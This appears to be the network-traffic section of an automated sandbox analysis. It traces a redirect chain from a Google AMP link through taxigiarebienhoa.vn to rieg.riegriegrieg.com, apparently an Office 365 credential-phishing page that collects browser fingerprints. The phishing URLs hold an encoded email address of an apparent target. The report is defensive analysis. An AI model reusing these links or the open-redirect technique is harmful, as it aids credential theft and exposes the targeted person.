                                                                              Oct 26, 2024 08:48:47.878525019 CEST1.1.1.1192.168.2.40x135cNo error (0)windowsupdatebg.s.llnwi.net87.248.204.0A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:48.371320963 CEST1.1.1.1192.168.2.40x1f0aNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:48.371320963 CEST1.1.1.1192.168.2.40x1f0aNo error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:48.385009050 CEST1.1.1.1192.168.2.40xc197No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:48.385009050 CEST1.1.1.1192.168.2.40xc197No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:51.823467970 CEST1.1.1.1192.168.2.40xc8cNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:51.823467970 CEST1.1.1.1192.168.2.40xc8cNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:51.823467970 CEST1.1.1.1192.168.2.40xc8cNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:51.825033903 CEST1.1.1.1192.168.2.40x2fe8No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:51.825033903 CEST1.1.1.1192.168.2.40x2fe8No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:52.876238108 CEST1.1.1.1192.168.2.40xbfe3No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:52.876238108 CEST1.1.1.1192.168.2.40xbfe3No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:49:05.083887100 CEST1.1.1.1192.168.2.40xdeafNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2024 08:49:05.083887100 CEST1.1.1.1192.168.2.40xdeafNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:49:23.542001963 CEST1.1.1.1192.168.2.40xc971No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2024 08:49:23.542001963 CEST1.1.1.1192.168.2.40xc971No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:49:41.117326021 CEST1.1.1.1192.168.2.40x3da7No error (0)sandoom2notnt.com188.114.97.3A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:49:41.117326021 CEST1.1.1.1192.168.2.40x3da7No error (0)sandoom2notnt.com188.114.96.3A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:49:41.139216900 CEST1.1.1.1192.168.2.40x4ff9No error (0)sandoom2notnt.com65IN (0x0001)false
                                                                              Oct 26, 2024 08:49:44.749969959 CEST1.1.1.1192.168.2.40xc709No error (0)sandoom2notnt.com65IN (0x0001)false
                                                                              Oct 26, 2024 08:49:44.896059990 CEST1.1.1.1192.168.2.40xfe82No error (0)sandoom2notnt.com188.114.97.3A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:49:44.896059990 CEST1.1.1.1192.168.2.40xfe82No error (0)sandoom2notnt.com188.114.96.3A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:49:50.214586020 CEST1.1.1.1192.168.2.40x288fNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2024 08:49:50.214586020 CEST1.1.1.1192.168.2.40x288fNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:49:50.712616920 CEST1.1.1.1192.168.2.40x22b0No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2024 08:49:50.712616920 CEST1.1.1.1192.168.2.40x22b0No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.78A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:49:50.712616920 CEST1.1.1.1192.168.2.40x22b0No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.33A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:49:50.712616920 CEST1.1.1.1192.168.2.40x22b0No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.5A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:49:50.712616920 CEST1.1.1.1192.168.2.40x22b0No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.89A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:49:50.716564894 CEST1.1.1.1192.168.2.40xf203No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                              • www.google.co.uk
                                                                              • taxigiarebienhoa.vn
                                                                                • rieg.riegriegrieg.com
                                                                              • https:
                                                                                • cdn.socket.io
                                                                                • aadcdn.msauth.net
                                                                                • logincdn.msauth.net
                                                                                • www.w3schools.com
                                                                                • aadcdn.msftauth.net
                                                                                • sandoom2notnt.com
                                                                              • fs.microsoft.com
                                                                              • otelrules.azureedge.net
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.449739103.255.237.40805436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 26, 2024 08:48:40.526001930 CEST504OUTGET /nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20 HTTP/1.1
                                                                              Host: taxigiarebienhoa.vn
                                                                              Connection: keep-alive
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Encoding: gzip, deflate
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Oct 26, 2024 08:48:41.586899042 CEST456INHTTP/1.1 200 OK
                                                                              Server: openresty
                                                                              Date: Sat, 26 Oct 2024 06:48:41 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              Vary: Accept-Encoding
                                                                              refresh: 0;url=https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N#Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20
                                                                              X-Turbo-Charged-By: LiteSpeed
                                                                              Content-Encoding: gzip
                                                                              Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 140
                                                                              Oct 26, 2024 08:48:42.124744892 CEST452OUTGET /favicon.ico HTTP/1.1
                                                                              Host: taxigiarebienhoa.vn
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Referer: http://taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20
                                                                              Accept-Encoding: gzip, deflate
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Oct 26, 2024 08:48:42.479914904 CEST778INHTTP/1.1 404 Not Found
                                                                              Server: openresty
                                                                              Date: Sat, 26 Oct 2024 06:48:42 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                              Pragma: no-cache
                                                                              X-Turbo-Charged-By: LiteSpeed
                                                                              Content-Encoding: gzip
                                                                              Data Raw: 31 62 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5d 52 4d 6f db 30 0c bd 17 e8 7f 60 3d ec 16 c1 76 e6 02 83 ed 18 28 f6 81 9d b6 1d 7a d9 51 b6 e9 48 a8 2c 79 12 ed a4 fb f5 a3 9c ba 6b a6 83 3e 28 f2 f1 f1 91 f5 dd e7 1f 9f 1e 7f fd fc 02 8a 46 d3 dc d4 f1 80 40 cf 06 0f 89 42 7d 54 54 e6 59 f6 3e 89 5f 28 7b 3e 46 24 09 56 8e ec b0 68 3c 4d ce 53 02 9d b3 84 96 0e c9 49 f7 a4 0e 3d 2e ba 43 b1 3e 76 a0 ad 26 2d 8d 08 9d 64 d8 7c 07 41 79 6d 9f 04 39 31 68 3a 58 97 40 ca c0 a4 c9 60 03 45 56 c0 77 47 f0 d5 cd b6 bf bd a9 d3 8b bd 4e 5f f2 b7 ae 7f de 18 76 ce 38 5f c2 bb a2 28 2a 18 a5 3f 6a 5b 66 d5 c0 64 4a b0 ce 8f d2 40 5e 4c e7 74 9f 4d 67 78 f0 4c 62 07 df d0 2c 48 ba 93 cc 43 da 20 02 7a 3d 54 f0 a6 d8 0a 5a d9 3d 1d 7d 24 20 b6 14 c3 30 54 51 85 5e 2f ff e9 23 67 72 9c 5d 5b 71 85 91 34 10 d7 db 00 c2 33 09 69 f4 d1 96 d0 b1 5c e8 2b 58 35 2a 3f 66 cc 70 2b 41 18 1c b8 00 51 5c 8c 93 0b ac 9f b3 a5 6c 83 33 33 61 05 e4 a6 12 3e c4 2c ab eb 3d df 98 1b bc ac 5a e5 5b c6 57 4d 20 8a 22 82 fe 83 [TRUNCATED]
                                                                              Data Ascii: 1b7]RMo0`=v(zQH,yk>(F@B}TTY>_({>F$Vh<MSI=.C>v&-d|Aym91h:X@`EVwGN_v8_(*?j[fdJ@^LtMgxLb,HC z=TZ=}$ 0TQ^/#gr][q43i\+X5*?fp+AQ\l33a>,=Z[WM "e~m.A|D4WS{G1w{@f8R:wfAWcqD37]0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.449736172.217.16.1954435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:48:39 UTC1050OUTGET /url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20 HTTP/1.1
                                                                              Host: www.google.co.uk
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-User: ?1
                                                                              Sec-Fetch-Dest: document
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:48:39 UTC1076INHTTP/1.1 302 Found
                                                                              Location: https://www.google.co.uk/amp/taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20
                                                                              Cache-Control: private
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Strict-Transport-Security: max-age=31536000
                                                                              Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-9RqyGNPXK3wJrtjdHf85mg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                              Permissions-Policy: unload=()
                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                              Date: Sat, 26 Oct 2024 06:48:39 GMT
                                                                              Server: gws
                                                                              Content-Length: 316
                                                                              X-XSS-Protection: 0
                                                                              Set-Cookie: NID=518=JOKiZQSKf-RapXvTMPj2l6Y3Ppx0xRRhVER9I5yYXcpulQgNPnRIqifCOv4URqxjPp9llJLlGn_8esOKptBIH5UGUMEferI3MRY95BGtQ3YbjU_uvfTeTDq4lZRxlAgZe350GiO3PlQ-xsJQ5a8eLhqBXr4pWLYvQq3XLjsIGpMmw6OBOUV0tysVo1OE-871; expires=Sun, 27-Apr-2025 06:48:39 GMT; path=/; domain=.google.co.uk; Secure; HttpOnly; SameSite=none
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close
                                                                              2024-10-26 06:48:39 UTC302INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 61 6d 70 2f 74 61 78 69 67 69 61 72 65 62 69 65 6e 68 6f 61 2e 76 6e 2f 6e 69 6e 69 2f 79 62 6d 65 78 2f 63 61 70 74 63 68 61 2f 5a 33 56 73 59 57 31 79 59 58 4e 31 62 43 35 6a 61 47 56
                                                                              Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.co.uk/amp/taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGV
                                                                              2024-10-26 06:48:39 UTC14INData Raw: 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                              Data Ascii: BODY></HTML>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.449735172.217.16.1954435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:48:39 UTC1108OUTGET /amp/taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20 HTTP/1.1
                                                                              Host: www.google.co.uk
                                                                              Connection: keep-alive
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-User: ?1
                                                                              Sec-Fetch-Dest: document
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: NID=518=JOKiZQSKf-RapXvTMPj2l6Y3Ppx0xRRhVER9I5yYXcpulQgNPnRIqifCOv4URqxjPp9llJLlGn_8esOKptBIH5UGUMEferI3MRY95BGtQ3YbjU_uvfTeTDq4lZRxlAgZe350GiO3PlQ-xsJQ5a8eLhqBXr4pWLYvQq3XLjsIGpMmw6OBOUV0tysVo1OE-871
                                                                              2024-10-26 06:48:39 UTC866INHTTP/1.1 302 Found
                                                                              Location: http://taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20
                                                                              Cache-Control: private
                                                                              X-Robots-Tag: noindex
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-5qGPIFilZnIF-wXkP1M2sw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                              Permissions-Policy: unload=()
                                                                              Date: Sat, 26 Oct 2024 06:48:39 GMT
                                                                              Server: gws
                                                                              Content-Length: 294
                                                                              X-XSS-Protection: 0
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close
                                                                              2024-10-26 06:48:39 UTC294INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 74 61 78 69 67 69 61 72 65 62 69 65 6e 68 6f 61 2e 76 6e 2f 6e 69 6e 69 2f 79 62 6d 65 78 2f 63 61 70 74 63 68 61 2f 5a 33 56 73 59 57 31 79 59 58 4e 31 62 43 35 6a 61 47 56 77 64 58 64 68 62 47 46 41 59 32 56 32 59 57 78 76 5a 32 6c 7a 64
                                                                              Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzd


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.449743192.185.209.04435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:48:43 UTC769OUTGET /n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N HTTP/1.1
                                                                              Host: rieg.riegriegrieg.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-Dest: document
                                                                              Referer: http://taxigiarebienhoa.vn/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:48:43 UTC303INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:48:43 GMT
                                                                              Server: Apache
                                                                              Upgrade: h2,h2c
                                                                              Connection: Upgrade, close
                                                                              Cache-Control: max-age=7200
                                                                              Expires: Sat, 26 Oct 2024 08:48:43 GMT
                                                                              Vary: Accept-Encoding
                                                                              X-Newfold-Cache-Level: 2
                                                                              Transfer-Encoding: chunked
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              2024-10-26 06:48:43 UTC4726INData Raw: 31 32 36 39 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 59 6f 75 20 6e 65 65 64 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 74 6f 20 72 75 6e 20 74 68 69 73 20 61 70 70 2e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 72 6f
                                                                              Data Ascii: 1269<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> </head> <body> <noscript>You need to enable JavaScript to run this app.</noscript> <div id="ro


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.449741184.28.90.27443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:48:43 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              Accept-Encoding: identity
                                                                              User-Agent: Microsoft BITS/7.8
                                                                              Host: fs.microsoft.com
                                                                              2024-10-26 06:48:43 UTC467INHTTP/1.1 200 OK
                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                              Content-Type: application/octet-stream
                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                              Server: ECAcc (lpl/EF70)
                                                                              X-CID: 11
                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                              X-Ms-Region: prod-weu-z1
                                                                              Cache-Control: public, max-age=122179
                                                                              Date: Sat, 26 Oct 2024 06:48:43 GMT
                                                                              Connection: close
                                                                              X-CID: 2


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.449742192.185.209.04435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:48:44 UTC993OUTPOST /n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N HTTP/1.1
                                                                              Host: rieg.riegriegrieg.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 139493
                                                                              Cache-Control: max-age=0
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Upgrade-Insecure-Requests: 1
                                                                              Origin: https://rieg.riegriegrieg.com
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-Dest: document
                                                                              Referer: https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:48:44 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                                                                              Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
